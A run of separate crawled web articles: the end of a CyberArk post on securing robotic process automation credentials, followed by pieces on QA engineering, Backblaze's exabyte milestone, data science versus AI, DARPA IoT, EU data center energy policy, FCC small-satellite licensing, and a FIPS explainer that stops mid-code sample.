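        headers={"Authorization": f"Bearer {os.environ['ROBOT_API_TOKEN']}"},
        timeout=10,
    )
    response.raise_for_status()
    return response.json()  # e.g. {"username": "...", "password": "...", "expires_in": 300}

# The robot requests credentials just-in-time for each step of the process,
# so a breach of one target system does not ripple across the others.
erp_account = get_robot_credential("erp-invoicing")
crm_account = get_robot_credential("crm-billing")
```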
Interested in learning more about securing RPA with CyberArk? Watch a recent, on-demand webinar, which outlines what IT security professionals need to know about RPA platforms and the connection to privileged credentials. And for further reading, discover five RPA security best practices for privileged credentials and access, and download the “The CISO View: Protecting Privileged Access in Robotic Process Automation.” | <urn:uuid:7e7a2d5e-9cd6-4330-bc4e-9626cbca0745> | CC-MAIN-2022-40 | https://www.cyberark.com/resources/blog/the-power-and-potential-of-robotic-process-automation-and-the-security-risks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00602.warc.gz | en | 0.920365 | 999 | 3.171875 | 3 |
Do you know why the Mars Climate Orbiter spacecraft, supposedly one of the most ground-breaking projects of its time, failed so miserably? Simply because someone failed to use the right units.
Seriously? Yes, this is what happens when small errors — ones that could easily have been avoided by quality testing — are neglected. These basic errors often cause unbearable financial or reputational losses, even when a project is well documented, delivered on time, and built to the business requirements.
Think of the trouble Heathrow Airport ran into when it opened its new Terminal 5.
So, if you want to avoid such expensive mistakes, think of hiring a Quality Assurance (QA) Engineer, whose main job is to prevent defects, ensuring the quality of your development process and its results. This is how big ventures secure a sound position in the market. They know how to achieve an edge over their competitors, thanks to their dedicated QA efforts.
What is Quality Assurance (QA)?
As the name suggests, Quality Assurance (QA) is a systematic process that determines whether a product or service meets a defined set of requirements. It is an essential element of quality management that focuses on providing confidence that the quality requirements have been fulfilled.
Software Quality Assurance aims to improve work processes and efficiency, enabling companies to win customer confidence and boost their credibility. Being preventive, a QA system identifies flaws, if any, in the approaches, methods, techniques, and processes that are designed to complete a project.
QA has two fundamentals:
- To ensure the highest quality of a product by controlling its progress.
- To test the hell out of every feature.
As part of your team, QA engineers should be involved in the product development process right from the very beginning. They will identify risks, collect and refine requirements by analyzing the customer’s brief, and, yes, push back to developers when a proposed solution will not be acceptable.
Who is a QA Engineer?
A Quality Assurance Engineer is a person who is responsible for the quality of the final product. It is his/her job to maximize the quality of the product by testing it throughout the development process.
The role differs from company to company. You might find successful QA Engineers or QA Analysts who know nothing about coding or the development process; their job is simply to test the final product for bugs. Other companies hire mid- to senior-level developers who also know every step of the development process and the code. Either way, a QA Engineer looks at quality mainly from a business perspective, mixed with a technical approach.
Let’s discuss in more detail the contribution of a QA Engineer in a Software Development Company.
A QA Engineer’s Contribution to SDLC (Software Development Life Cycle)
Ideally, a QA Engineer plays a crucial part in the entire Software Development Life Cycle. An SDLC testing cycle is the cadence within which QA Engineers work through five test stages, typically once per sprint.
Here, you will see all the five phases a QA Engineer goes through with specific tasks. So, let’s begin:
Phase # 1: Gathering Details — Determining Approach to QA on the Project
It is the first and most crucial stage in the entire SDLC.
In the initial meeting, the client describes everything they want. They outline the functionality of the desired platform, whether it is a web or mobile app, and provide a list of everything they will need in it, from technology to features.
Once the requirement from the client has been obtained, the next tasks include:
- Analyzing and deciding whether the requirements can be integrated into a single system.
- Which solutions will work and which won’t.
- Planning the required software development testing stages and techniques.
Phase # 2: Validation — Verifying requirements of a planned project
Validation is the QA of a project before its development starts: finding out whether the project can meet users’ expectations and whether the idea is worth investing time and money into. During this process, QA Engineers collaborate with the client and the project leader to research the market and users’ expectations.
The research aims to analyze if the product will make sense to the market and users. Gathering feedback from clients regarding design, features, and usability will help improve the user experience.
Validation is a critical stage, and without it, the product may never reach its audience. This stage also provides indications that the product will be profitable for the client. Otherwise, why bother in the first place?
Phase # 3: Test Planning — Writing Test Cases
In this stage, a QA Engineer creates test cases or test scenarios. These are essentially user stories that define how the application should behave. For a simple login feature, two such scenarios might read:
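- Given a registered user on the login page, when they submit a valid email address and password, then they are redirected to their dashboard and greeted by name.
- Given a registered user on the login page, when they enter an incorrect password three times in a row, then the account is temporarily locked and a password-reset email is sent.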
If this phase is not done well, the testing process will be full of unexpected obstacles and contingencies. To ensure the later stages follow a clear sequence of actions, it is the QA’s job to draw up and document the action plan; otherwise, the process itself becomes clumsy.
We at Selleo use a Behavior-Driven Development (BDD) approach at this stage. BDD addresses both of these problems, unclear plans and a clumsy process, elegantly and efficiently.
Phase # 4: Testing developed features manually
After the test plan is done, a QA engineer will move on to the next stage, creating a testing environment and executing test cases. It is good to perform various types of tests to ensure the maximum quality of the product. Some of these test examples are:
- Exploratory Test — a type of software testing in which test cases are not developed in advance; instead, testers check the system on the fly. The QA may jot down a rough list of things to examine before starting, but the focus is on testing as a “thinking” activity: discovery, investigation, and learning. The tester has both freedom and responsibility here.
- System Integration Test — a software testing method that takes place in an integrated hardware and software environment to verify the behavior of the complete system and evaluate its compliance with the specified requirements.
- Regression Tests — testing performed after a recent program or code change to confirm that it has not adversely affected existing features. Regression testing re-executes a full or partial selection of already-run test cases to verify the platform’s existing functionality, making sure the old code still works after the latest changes.
Phase # 5: Test automation
Automated tests differ from manual tests, where a human sits in front of the computer and carefully executes the test steps. The most significant advantage of automation testing is that test cases are executed automatically, which saves a lot of time.
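As a deliberately simplified illustration, here is what the lockout scenario sketched earlier might look like as an automated check written for Python’s pytest. The login routine is a toy stand-in, not real application code:

```python
def login(email: str, password: str, attempts: dict, max_attempts: int = 3) -> str:
    """Toy login routine used only to illustrate an automated check."""
    if attempts.get(email, 0) >= max_attempts:
        return "locked"
    if password == "correct-horse-battery-staple":
        return "ok"
    attempts[email] = attempts.get(email, 0) + 1
    return "rejected"

def test_account_locks_after_three_failed_attempts():
    attempts = {}
    for _ in range(3):
        assert login("user@example.com", "wrong", attempts) == "rejected"
    # Once the threshold is reached, even the correct password is refused.
    assert login("user@example.com", "correct-horse-battery-staple", attempts) == "locked"
```

A test runner executes checks like this on every build, so a regression in the lockout rule is caught the day it is introduced rather than weeks later.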
After executing all the tests on the software, if every function works as expected, the test run is marked as Passed. In this way, we make sure that no details are missed and the product is sound. If a test case fails, it means something in the code is not right, so the QA fails the build and sends a report to the developers to investigate and fix.
The QA report explains in detail what went wrong or not. If issues were detected, each of them must be well documented to ensure fast bug fixes without any misunderstandings from the developers’ side. Now, let’s talk about the advantages you will get from having a QA Engineer in your team.
Four Key Benefits of having a QA Engineer in your Team
There are thousands of products and services available in the market, so how do companies differentiate their products from their competitors’ and ensure superior quality? This is where the Quality Assurance department, or QA for short, comes into play.
There are countless benefits of having a QA Engineer in your team, but we will talk about the four essential benefits.
Save Time and Money
A highly qualified and experienced QA Engineer contributes to building the application in a way that saves the company time and money. Look at it this way: if inconsistencies and bugs are not reported at an early stage, it will cost the company far more time and money to repeat the entire process. When developing an extensive software system, miscommunication between developers can easily happen, and that miscommunication can lead to a buggy application; in the worst scenarios, the code does not work at all. A QA Engineer works throughout the process and keeps the chain intact via a proper Test Plan. Finding ambiguities and mistakes in the stated requirements contributes the biggest value: the sooner a bug is found, the less damage it does to the whole project.
If a QA engineer supports the kick-off of the project, it can also speed up the whole process as the client knows what to provide from the very beginning.
Improving the Quality of the Product/Service
If a project team doesn’t have QA Engineers, that means somebody else (developers, analysts, or even project managers) needs to perform tests of the application and may not do it correctly. A QA engineer focuses on approving delivered content instead of delivering the content itself. Because of that, he has a slightly different approach than a developer.
Both developers and testers have the same goal, but the perspective is different. A developer tests the application hoping that no issues are found as that would mean additional work for him or other developers.
A QA engineer is not involved in fixing issues (excluding retesting, which is usually not so time-consuming). That allows him not to be biased by concerns or fear while searching for further issues.
Moreover, as QA engineers spend more time on testing than developers do, they know more techniques for finding bugs and strange behaviors in the application. A QA Engineer also spends time researching the market and customer demand, so they understand what the application is really meant to do. Developers do not improve their testing skills as much as their development skills; that is the QA engineer’s role. And some testers are simply eager to find issues, which is not a bad approach.
A Proper Alignment of Duties within the Team
The presence of QA engineers in a project helps assign the right jobs to the right people. In theory, anybody can click through the application and test the provided functionality.
As a result, everybody happens to do it, so it consumes developers’, analysts’, and project managers’ time, which should be spent on other things. If there are people responsible for QA in the project, everybody can focus on their duties. Besides, the quality of the application gains appropriate attention from people dedicated to assuring it.
QA Engineers Help Secure Company Reputation
What if the application you just released has many bugs? You will lose your clients, and you will lose them for good. Now repeat the same scenario, but this time it is an app you built for a client. Not only will your client’s reputation be drastically damaged because of the buggy app you designed; your own reputation will be damaged too.
A QA Engineer provides better insight into the product or service. The analysis of a QA engineer can help determine the risk a company faces while launching the application in the market. Quality Assurance team ensures that the product or service introduced by the company is not only of high quality but also as per the expectations of the clients.
Believe it or not, QA saves a company millions of rupees in damages and even in legal action that a client might take after a loss. Add to that the cost of repairing a product or service that has already been launched in the market. Nowadays, QA testing isn’t a formality; it is a business analysis tool.
A QA Engineer is the need of the hour for every company, whether product-based or services-based. Companies that develop software for clients are especially likely to have QA Analysts, QA Specialists, or QA Engineers ensuring the overall quality of the product.
Development companies with an impressive, competent QA program can attract more clients. Having an experienced QA team reinforces a company’s reputation as a high-quality supplier and strengthens employee commitment.
A good QA team helps establish a strong company reputation and ensures that it is successful by providing excellent products, which in turn provides more profit and customer loyalty.
if you want to work with an experienced QA engineer visit us at: www.selleo.com. | <urn:uuid:901225c3-3acc-45cf-a214-0cc726309e5c> | CC-MAIN-2022-40 | https://cioviews.com/why-do-we-need-qa-engineers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00602.warc.gz | en | 0.947212 | 2,681 | 2.6875 | 3 |
What is an Exabyte?
An exabyte is made up of bytes, which themselves are units of digital storage. A byte is made up of 8 bits. A bit—short for “binary digit”—is a single unit of data. Namely a 1, or a 0.
The International System of Units (SI) defines the prefix “exa” as multiplication by the sixth power of 1,000, i.e., 10^18.
In other words, 1 exabyte (EB) = 10^18 bytes = 1,000^6 bytes = 1,000,000,000,000,000,000 bytes = 1,000 petabytes = 1 million terabytes = 1 billion gigabytes. Overwhelmed by numbers yet?
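If you would rather let a computer keep track of the zeros, a few lines of Python make the same point:

```python
# Powers of 1,000, per the SI prefixes.
KB, MB, GB = 1000, 1000**2, 1000**3
TB, PB, EB = 1000**4, 1000**5, 1000**6

print(f"{EB:,} bytes in an exabyte")   # 1,000,000,000,000,000,000
print(EB // PB, "petabytes")           # 1,000
print(EB // TB, "terabytes")           # 1,000,000
print(EB // GB, "gigabytes")           # 1,000,000,000
```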
Why don’t we give you some examples of what these numbers actually look like? We created this infographic to help put it in perspective.
The Road to an Exabyte of Cloud Storage
So now that you know what an exabyte looks like, let’s look at how Backblaze got there.
Way back in 2010, we had 10 petabytes of customer data under management. It was a big deal for us, it took us two years to accomplish and, more importantly, it was a sign that thousands of customers trusted us with their data.
It meant a lot! But when we decided to tell the world about it, we had a hard time quantifying just how big 10 petabytes were, so naturally we made an infographic.
That’s a lot of hard drives. A Burj Khalifa of drives, in fact.
In what felt like the blink of an eye, it was two years later, and we had 75 petabytes of data. The Burj was out. And, because it was 2013, we quantified that amount of data like this…
Pop songs now average around 3:30 in length, which means if you tried to listen to this imaginary musical archive, it would take you 167,000 years. And sadly, the total number of recorded songs is only the tens to hundreds of millions, so you’d have some repeats.
That’s a lot of songs! But more importantly, our data under management had grown by 750%! But we could barely take time to enjoy it because five months later we hit 100 petabytes, and we had to call it out. Stacking up to the Burj Khalifa was in the past! Now, we rivaled Mt. Shasta…
But stacking drives was rapidly becoming less effective as a measurement. Simply put, the comparison was no longer apples to apples: the 3,000 drives we stacked up in 2010 only held one terabyte of data. If you were to take those same 3,000 drives and use the average drive size we had in 2013, about 4 terabytes of data per drive, the size of the stack would stay the same, as hard drives had not physically grown, but the density of the storage inside the drives had grown by 400%.
Regardless, the years went by, we launched an award-winning cloud storage service (Backblaze B2), and the incoming petabytes kept on accelerating—150 petabytes in early 2015, 200 before we reached 2016. Around there, we decided we needed to wait until the next big moment, and in February 2018, we hit 500 petabytes.
It took us two years to store 10 petabytes of data.
Over the next 7 years, by 2018, we stored another 500 petabytes.
And today, we reset the clock, because in the last two years, we’ve added another 500 petabytes. Which means we’re turning the clock back to 1…
Today, across 125,000 hard drives, Backblaze is managing an exabyte of customer data.
And what does that mean? Well, you should ask Ahin. | <urn:uuid:52808861-de54-44de-8ee4-bbba0a1f1855> | CC-MAIN-2022-40 | https://www.backblaze.com/blog/what-is-an-exabyte/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00602.warc.gz | en | 0.961777 | 814 | 3.3125 | 3 |
In the last couple of years there has been an explosion of workshops, conferences, symposia, books, reports and blogs covering the use of data in different fields, and a whole family of related terms has come into use, such as ‘data’, ‘data-driven’ and ‘big data’. Some of them refer to techniques – ‘data analytics’, ‘machine learning’, ‘artificial intelligence’, ‘deep learning’, etc.
Today we look more in detail about two important terms, widely used data science and artificial intelligence and understand the difference between them, the purpose for which they are deployed and how they work etc.
What is Data Science?
Data science is the analysis and study of data. It is instrumental in driving the fourth industrial revolution under way in the world today, which has produced an explosion of data and a growing need for industries to rely on data to make informed decisions. Data science draws on various fields, including statistics, mathematics, and programming.
Data science involves various steps and procedures, such as data extraction, manipulation, visualization and maintenance, with the aim of forecasting the occurrence of future events. Industries need data scientists to help them make informed, data-driven decisions. Data scientists also help product development teams tailor products that appeal to customers by analysing their behaviour.
What is Artificial Intelligence?
Artificial Intelligence (AI) is a broad and relatively modern field, although some of its ideas date back much further; the discipline itself was born in 1956 at a workshop at Dartmouth College. AI is usually contrasted with the natural intelligence displayed by humans and other animals: it is modelled after natural intelligence and is concerned with building intelligent systems, using algorithms to make autonomous decisions and take autonomous actions.
Traditional AI systems are goal-driven, whereas contemporary AI algorithms like deep learning learn the patterns and locate the goal embedded in the data. AI also makes use of software engineering principles to develop solutions to existing problems. Major technology giants like Google, Amazon and Facebook are leveraging AI to develop autonomous systems using neural networks, which are modelled after human neurons, learn over time and execute actions.
Comparison Table: Data Science vs Artificial Intelligence
Below table summarizes the differences between the two terms:
| Parameter | Data Science | Artificial Intelligence |
|---|---|---|
| Definition | A comprehensive process comprising pre-processing, analysis, visualization and prediction; a discipline that performs analysis of data | Implementation of predictive models used in forecasting future events; a tool that helps create better products and impart them with autonomy |
| Techniques | Various statistical techniques are used | Based on computer algorithms |
| Tool set | The set of available tools is quite large | AI uses a limited tool set |
| Purpose | Finding hidden patterns in data; building models which use statistical insights | Imparting autonomy to the data model; building models that emulate cognitive ability and human-like understanding |
| Processing | Modest processing requirements | High degree of scientific processing requirements |
| Applicability | Applicable to a wide range of business problems and issues | Applicable to replacing humans in specific tasks and workflows only |
| Tools used | Python and R | TensorFlow, Caffe, Scikit-learn |
Where to use Data Science?
Data science should be used when:
- Identification of patterns and trends required
- Requirement for statistical insight
- Need for exploratory data analysis
- Requirement of fast mathematical processing
- Use of predictive analytics required
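As a rough, hypothetical illustration of the first two needs above, pattern identification and statistical insight, a few lines of pandas and scikit-learn go a long way:

```python
import pandas as pd
from sklearn.linear_model import LinearRegression

# Hypothetical data: ad spend vs. revenue.
df = pd.DataFrame({
    "ad_spend": [10, 20, 30, 40, 50],
    "revenue":  [25, 48, 70, 95, 118],
})

print(df.describe())   # quick statistical summary
print(df.corr())       # how strongly are the two columns related?

model = LinearRegression().fit(df[["ad_spend"]], df["revenue"])
print(model.coef_[0], model.intercept_)              # the fitted relationship
print(model.predict(pd.DataFrame({"ad_spend": [60]})))  # forecast at a new spend level
```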
Where to use Artificial Intelligence?
Artificial intelligence should be used when:
- Precision is the requirement
- Fast decision making is needed
- Logical decision making without emotional intelligence is needed
- Repetitive tasks are required
- Need to perform risk analysis | <urn:uuid:16f01010-5a67-483b-8748-77cb4a57bf84> | CC-MAIN-2022-40 | https://networkinterview.com/data-science-vs-artificial-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00602.warc.gz | en | 0.909739 | 802 | 3.09375 | 3 |
US defence agency DARPA is planning to harness the power of the Internet of Things (IoT) for military purposes.
With the US looking for increasingly innovative ways to gain an advantage in the battlefield, Defense Advanced Research Projects Agency (DARPA) is investing in the development of sensors and artificial intelligence systems that could facilitate the extraction and analysis of information from enemy devices and communication.
With information and intelligence becoming more and more key in the guerrilla warfare of the 21st century, tailored IoT systems could arm the US with the data needed to stay one step ahead.
DARPA research and funding has been partly responsible for plenty of technologies that are commonplace today. It played a part in the development of the internet, the precursor of what we now know as virtual reality, and modern global positioning systems (GPS).
Read more: US Air Force Mulls IoT Deployment
But DARPA is also looking into ways the IoT can be used in security networks in the case of an attack on US soil. A research program aimed at preventing attacks involving radiological “dirty bombs” and other nuclear threats has successfully developed and demonstrated a network of smartphone-sized mobile devices that can detect the tiniest traces of radioactive materials, according to a news post on the agency’s website.
The August 2016 post read: “Combined with larger detectors along major roadways, bridges, other fixed infrastructure, and in vehicles, the new networked devices promise significantly enhanced awareness of radiation sources and greater advance warning of possible threats.”
Fighters become a part of the IoT
Graham Grose, Industry Director of the IFS Aerospace & Defence Centre of Excellence, pointed out that fighter jets are becomingly increasingly connected, and able to gather huge quantities of data from a single flight.
“The military is no stranger to new technology,” he said. “Companies in the field have been taking advantage of 3D printing, wearable and virtual reality technology to improve efficiency and reduce operating costs – IoT included.”
“With IoT, inexpensive sensors can collect important flight data. For example, at the unveiling of the new Bombardier C series at the Paris Airshow last year, it was reported that the Pratt & Whitney PW1000G family engine has around 5000 sensors able to generate up to 10GB of data per second. This means a single twin-engine aircraft with an average flight time of 12 hours can be producing up to 844TB of data. To put this in perspective, it is estimated that Facebook accumulates around 600TB of data per day.”
Speaking to Internet of Business, Grose also highlighted the importance of separating useful data from the ‘noise’. “The next step is for the support of a maintenance system that can filter out the ‘noise’ and suggest actions that provide real business benefits,” he said. “In A&D, these include shortening flight times, optimising jet fuel consumption, improving engine efficiency and reducing maintenance time and cost.” | <urn:uuid:66440b61-1eeb-42b5-b83e-c9edf112fae9> | CC-MAIN-2022-40 | https://internetofbusiness.com/darpa-wants-militarise-iot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00602.warc.gz | en | 0.939246 | 676 | 2.890625 | 3 |
When searching for ways to protect your business’s network from distributed denial-of-service (DDoS) attacks, you may come across rate limiting. Countless businesses use rate limiting as part of their overall cybersecurity strategy. It allows them to limit activity on their respective network. While rate limiting can prove useful, though, it won’t necessarily shield your business’s network from DDoS attacks.
The Basics of Rate Limiting
Rate limiting is an approach to limiting the rate at which users can access or interact with a private network. Your business’s network can only handle so much traffic until it begins to experience performance issues. Turning a blind eye to traffic on your business’s network could lead to longer download times — or it could even take your business’s network offline. Of course, that’s the principle behind DDoS attacks. DDoS attacks are intended to overwhelm the resources of a network or server.
You can control traffic coming into your business’s network with rate limiting. Rate limiting does exactly what it sounds like: sets a limit for the rate at which users can interact with your business’s network. Interactions are typically defined as requests. When a user sends your business’s network a request, it will count as an interaction.
How Rate Limiting Works for DDoS Attacks
Even with rate limiting in place, your business’s network can still be hit by a DDoS attack. DDoS attacks, of course, involve spamming a victim’s network with requests. They often involve thousands or even hundreds of thousands of devices. Each of these devices will spam requests in an attempt to overwhelm the victim’s network.
While it may not prevent your business’s network from being targeted with DDoS, rate limiting is still worth using. It’s a form of mitigation. Rate limiting can block the devices that are trying to spam your business’s network. As these devices continue to send requests, they’ll eventually reach the cap defined by the rate limit.
There are different types of rate limiting, but most of them work in the following way:
- You set a rate limit consisting of a maximum number of user requests per hour, minute or second.
- The rate limiting system will monitor traffic while counting the number of requests they send.
- Users who reach this limit will then be blocked, meaning they won’t be able to access your business’s network.
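A minimal sketch of this counting approach (a simple fixed-window limiter) might look like the following in Python. It keeps counters in memory, so it is purely illustrative; production systems typically track counters in a shared store such as Redis:

```python
import time
from collections import defaultdict

MAX_REQUESTS = 100     # allowed requests per window
WINDOW_SECONDS = 60    # length of each window

_counters = defaultdict(int)   # (client_id, window) -> request count

def allow_request(client_id: str) -> bool:
    """Return True if the client is still under its limit for the current window."""
    window = int(time.time() // WINDOW_SECONDS)
    _counters[(client_id, window)] += 1
    return _counters[(client_id, window)] <= MAX_REQUESTS

# Check the limit before doing any real work for the request.
if not allow_request("203.0.113.7"):
    print("429 Too Many Requests")   # block or throttle the caller
```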
If you’re looking to mitigate the effects of DDoS attacks, you may want to leverage rate limiting. It won’t prevent DDoS attacks from occurring. It will, though, mitigate their effects. | <urn:uuid:1c5c3083-428e-40f7-a021-240fe71c56ba> | CC-MAIN-2022-40 | https://logixconsulting.com/2022/04/07/will-rate-limiting-protect-against-ddos-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00602.warc.gz | en | 0.929604 | 557 | 2.59375 | 3 |
European Union lawmakers are preparing to peg down the ballooning energy consumption of the block’s data center sector. The legislative push is part of an effort to avert the Earth's unfolding environmental catastrophe, which the United Nations described last week as humankind's "suicidal war" on nature. Yet, they are likely to take a light touch, DCK has learned.
In preparation for a decision by European governments this week on whether to demand that data centers become climate-neutral by 2030, the union’s executive body published a study detailing what the authors believed to be the most accurate forecast yet of the astounding growth in the amount of energy consumed by cloud computing systems.
The European Commission asked what legal powers it might use to cut the cloud’s energy consumption, and its consultants said the focus should be on toughening controls for the data centers that house the cloud systems. The consultants analyzed cloud computing architecture and concluded that it was so complex, so amorphous, and so quick to evolve, that it was impossible to measure it well enough to say when it was not energy-efficient enough to warrant intervention.
EU lawmakers are already preparing a volley of light-touch legal measures to usher the data center industry into greener operating practices. But tougher laws mooted this year -- such as a data center tax -- have been put under long-term review.
Cloud computing is a way for other (non-cloud) industries to cut their own carbon emissions, acknowledged the EU's Green Deal strategic plan for saving the planet, released back in January. But Europe might still need to act to make data centers more energy efficient, the plan warned. Addressing this question last week, EU advisors said that while growth in cloud computing's energy consumption had become "exponential," there was little more lawmakers could do besides creating a program of public information campaigns designed to make consumers and businesses aware of the energy cost that comes with their use of cloud services.
The advisors wanted tougher controls on data centers. Imposing energy-efficiency rules on data centers should be a priority, they said. Those rules should apply to both existing data centers and future ones going through approval processes. But those tougher recommendations did not make their formal shortlist.
EU digital legislators said the proposals would be the template for a final decision on what legal instruments it might use to achieve its declared aim of making data centers carbon neutral and energy efficient by 2030.
They put the tough measures onto a long-list of policies the EU could conceivably use but would take much time and effort, DCK understands. That includes a tax on dirty data centers and incentives for operators that invest in green data center technology. Multinational data center operators, faced with the prospect of shouldering a heavy cost for going greener but likely to catch a windfall from older data centers forced to close under any clampdown, lobbied lawmakers in Brussels to implement such measures earlier this year.
"Everything is still on the table," one of the Commission's top officials told DCK. "If you take 20 random professionals in any area and discuss going green, then incentives and taxation always come to the forefront. On tax, there's only so much power the EU has. But we are keeping our options completely open."
Too Complex to Measure
The Commission's consultants had considered an EU proposal for tax on cloud computing as well but concluded it would be impractical. This and other EU efforts to draft legislation to make cloud computing more energy efficient were hampered by the difficulty of measuring the environmental impact of such services.
"Legislation is a problem. Because if you want to enhance the sustainability of something, you have to measure it somehow, and measuring is a big, big problem for energy-efficient cloud computing. If you can't measure it, you don't have the possibility to have a law for it," said Dr. Therese Stickler, sustainable development expert at the Austrian Environment Agency, who made the policy recommendations in the EU report.
"We had a lot of discussion with experts at the European Commission on how to include cloud computing in the Energy Efficiency Directive (law). They said it was not possible, because there are too many intangible aspects in cloud computing that you can't really measure," she said.
The policy makers drew their conclusions from a cathedral-like schematic diagram of the many components that make up a cloud computing infrastructure, with fiber communications networks and data centers at the base and stack upon stack of software components. Energy-aware software and energy-saving networks were an aspiration but not within reach of policy makers.
"If you only look at the data centers, the material side of cloud computing, it's a little bit easier," said Stickler.
The Austrian agency gave multinational cloud and data center operators a chance to vote for their favored EU policy measures at an informal workshop last December. Alongside scientists, campaign groups, and officials from the EU, UN, and government bodies, they voted against EU proposals to impose energy-efficiency laws on their computing services. The group concluded that in addition to information campaigns, governments could do more to make data center energy efficiency more transparent and create standard measures to produce meaningful insights.
The proposal to impose mandatory efficiency targets on new or refurbished data centers had nevertheless made it onto the long-list of preliminary plans the EU has been exploring, the senior Commission official told DCK.
Many Ways to Regulate Data Center Energy
Meanwhile, the EU is already implementing laws to address data center energy efficiency. Foremost among them is its taxonomy regulation, a universal financial law that sets conditions for investors and financiers that want to claim their deals as green. Plans currently being examined by government committees and awaiting conclusion of a public consultation would in 2022 impose energy-efficiency conditions on anyone who claimed as green any data centers put up for collateral or lumped into a financial offering.
"Data centers are trying to portray themselves as being green when they ask for loans, and when they justify their refurbishments. And financial institutions often portray their instruments, which are principally bonds, as green," said the official.
"They say, 'Invest in my bond because it's green and would be good for the environment.' If part of the underlying assets are data centers, they would have to ensure those investments are poured into compliant data centers. They would be forced to back this statement up with compliance with the European Code of Conduct on Data Centre Energy Efficiency," he said. The same Code of Conduct -- which has been criticised for having no teeth -- was becoming the basis of other EU green laws. Stickler's policy report said it should be the starting point for further action.
Other laws being passed in Brussels include a reform that would make data centers part of the Eco-Design Directive, which stipulated this year that computer servers could not be sold for use in simple computing environments in Europe unless they met energy efficiency measures.
The Commission also has plans to update public procurement regulations, and it’s possible but not likely that public money would be precluded from being spent on data center services that did not meet green standards.
It is also drafting a law to make it more feasible to pipe heat from industrial sources like data centers into district heating projects. The Commission hopes other general industrial initiatives will count toward its tally of green data centers as well.
The point of it all was to do something about the fact that, while the energy demand of cloud computing was growing exponentially, its energy efficiency was not.
"This growth is so strong that it has more than offset the significant efficiency gains achieved at all levels of hardware, software, and data centre infrastructure," said last week’s report.
By 2025, total data center energy consumption in Europe will increase 21 percent on 2018 levels, when data centers consumed 2.7 percent of all electricity in Europe, the report forecasted. Cloud computing will be responsible for 60 percent of all energy consumed by data centers by 2025, nearly doubling its portion’s size in 2018.
The Commission official said the research was a "breakthrough," because it was the first clear estimate of data center energy consumption in Europe. It showed how previously existing forecasts of data center energy consumption differ wildly and called their veracity into question. Its own cautious forecast ventured only that Europe's data center energy consumption will reach 92.7 TWh in 2025, about three times as much electricity as the whole of Ireland consumed in 2018.
"It's possible the energy consumption of data centers will more than double in the next 10 years," said Dr. Ralph Hintemann, senior researcher at the Borderstep Institute, who authored the forecasts in the EU study. Recent events had not changed his forecast, he said.
"We know that in general, the data center market was affected very little by the [COVID-19] crisis,” Hintemann said. “There are some parts of the market -- especially [companies' own] on-premises data centers, where you have much less spending. But on the other hand, we have much more cloud computing. You have cloud data centers, where demand is increasing." | <urn:uuid:4f7eda7d-1b75-4822-bd73-053d46f1ad05> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/regulation/europe-edges-closer-green-data-center-laws | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334332.96/warc/CC-MAIN-20220925004536-20220925034536-00002.warc.gz | en | 0.966786 | 1,867 | 2.59375 | 3 |
Satellites are becoming more useful for broadband distribution as reusable rockets and launch vehicles are being miniaturized, lowering the costs for launching space equipment. The changes mean new competition in the broadband marketplace and new opportunities for rural residents who lack access to high-speed internet access. That’s led to startups popping up all over the country.
Last month, for example, SpaceX launched the first 60 low-earth orbit satellites of its Starlink constellation, managing to fit all of them into a single Falcon 9 rocket. SpaceX’s first 60 satellites took a few months to build but CEO Elon Musk said in May the company aims to get that down to a batch at least every two weeks — a rate he believes the company could reach by the end of the year, reported the Los Angeles Times. The FCC moved quickly to give the green light to satellite entrepreneurs like OneWeb, SpaceX, and O3b and is considering other applications from entrants like Amazon and Boeing.
The changes also mean the agency needs to change its satellite rules. That’s why FCC Chairman Ajit Pai circulated among his colleagues yesterday a draft order to make it easier and cheaper to license small satellites, or smallsats. “I see no reason why a satellite the size of a shoebox, with the life expectancy of a guinea pig, should be regulated the same way as a spacecraft the size of a school bus that will stay in orbit for centuries,” Pai told attendees of a Chamber of Commerce roundtable.
Under the draft order, applicants for satellites weighing less than about 400 lbs. could choose a streamlined alternative to existing licensing procedures that would feature an easier application process, a lower application fee, and a shorter timeline for review. It would offer potential RF interference protection for critical communication links.
Note that this process would be different from the one used by the conventional non-geostationary satellite constellations in the Commission’s processing rounds and wouldn’t affect proposals for large broadband-delivery constellations like those being deployed by SpaceX and OneWeb. Pai delivered the speech just days before the 50th anniversary of the Apollo 11 moon landing on July 20.
July 10, 2019 | <urn:uuid:dc258878-7f91-4887-88c7-4d5594ec9f82> | CC-MAIN-2022-40 | https://insidetowers.com/cell-tower-news-fcc-to-update-satellite-licensing-to-facilitate-broadband/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335303.67/warc/CC-MAIN-20220929003121-20220929033121-00002.warc.gz | en | 0.937006 | 447 | 2.765625 | 3 |
Federal Information Processing Standard
The Federal Information Processing Standards (FIPS) are a set of US Government security requirements for data and its encryption.
FIPS are publicly shared and encouraged by the US Federal Government, and overseen by the National Institute of Standards and Technology (NIST) of the Department of Commerce. Government agencies, partners, and those wanting to do business with the federal government are required to adhere to FIPS guidelines.
FIPS are applied according to the use case and the perceived value of the government data involved. The complying, or regulated, party must then adhere to the relevant standards for handling government information. As the secrecy and sensitivity of government data rises from classified to (top) secret, the severity of the FIPS standard applied to the people, practices, and technologies that hold and transmit the data rises with it.
Among FIPS standards are ones that cover data encryption such as the Advanced Encryption Standard (AES), which is a FIPS standard.
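As a concrete, simplified illustration, AES is what you are using when you reach for an authenticated-encryption primitive in most modern libraries, for example AES-GCM via Python’s cryptography package. Whether a particular build of that library runs on a FIPS 140-validated cryptographic module depends on how it was compiled and configured; the snippet only shows the algorithm in use:

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # AES-256 key
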